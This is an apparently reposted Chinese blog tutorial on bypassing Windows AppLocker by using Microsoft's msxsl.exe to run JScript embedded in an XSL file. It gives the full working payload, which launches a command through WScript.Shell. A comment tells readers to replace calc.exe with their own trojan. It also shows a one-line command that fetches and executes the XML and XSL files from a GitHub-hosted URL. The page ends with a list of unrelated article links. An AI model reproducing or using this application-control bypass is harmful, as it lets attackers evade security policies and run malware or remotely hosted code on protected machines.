博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用MSXSL.exe绕过AppLocker应用程序控制策略
阅读量:5243 次
发布时间:2019-06-14

本文共 807 字,大约阅读时间需要 2 分钟。

1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为:

https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714

2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:

msxsl.exe test.xml exec.xsl

test.xml:

Microsoft

 

exec.xsl

function xml(nodelist) {var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");//这里可以改造为执行你的木马文件如:// var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & shell.exe"); return nodelist.nextNode().xml; }

  

3.最终执行结果为:

 

 

4.也可以远程执行:

msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml  https://raw.githubusercontent.com/backlion/demo/master/exec.xsl

 

转载于:https://www.cnblogs.com/backlion/p/7348506.html

你可能感兴趣的文章
zookeeper适用场景:分布式锁实现
查看>>
110104_LC-Display(液晶显示屏)
查看>>
httpd_Vhosts文件的配置
查看>>
php学习笔记
查看>>
普通求素数和线性筛素数
查看>>
React Router 4.0 基本使用
查看>>
PHP截取中英文混合字符
查看>>
【洛谷P1816 忠诚】线段树
查看>>
电子眼抓拍大解密
查看>>
poj 1331 Multiply
查看>>
严重: 文档无效: 找不到语法。 at (null:2:19)
查看>>
tomcat7的数据库连接池tomcatjdbc的25个优势
查看>>
Html 小插件5 百度搜索代码2
查看>>
nodejs-Path模块
查看>>
P1107 最大整数
查看>>
监控CPU和内存的使用
查看>>
Ubuntu14.04设置开机自启动程序
查看>>
多进程与多线程的区别
查看>>
Ubuntu(虚拟机)下安装Qt5.5.1
查看>>
java.io.IOException: read failed, socket might closed or timeout, read ret: -1
查看>>